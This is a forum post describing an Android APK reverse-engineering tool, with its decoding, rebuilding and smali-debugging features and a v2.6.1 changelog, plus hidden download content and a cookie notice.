  25. It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to the nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also, it makes working with the app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc. Features Disassembling resources to the nearly original form (including resources.arsc, classes.dex, 9.png. and XMLs) Rebuilding decoded resources back to binary APK/JAR Organizing and handling APKs that depend on framework resources Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali) Helping with repetitive tasks Changelog v2.6.1 Begin options refactor by @iBotPeaches in #2648 fix: decoding references to private resources by @MrIkso in #2650 fix: support for signature scheme v4 by @iBotPeaches in #2705 Replace use of deprecated methods with their recommended replacements by @alsutton in #2713 Update dependencies by @Goooler in #2715 Cleanup trailing temp files/folders by @iBotPeaches in #2742 fix: prevent file hold on tmpDir during build by @iBotPeaches in #2745 refactor: drop unused exceptions by @iBotPeaches in #2746 Preventing instantiation of untrusted classes. by @iBotPeaches in #2760 [hide][Hidden Content]]
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.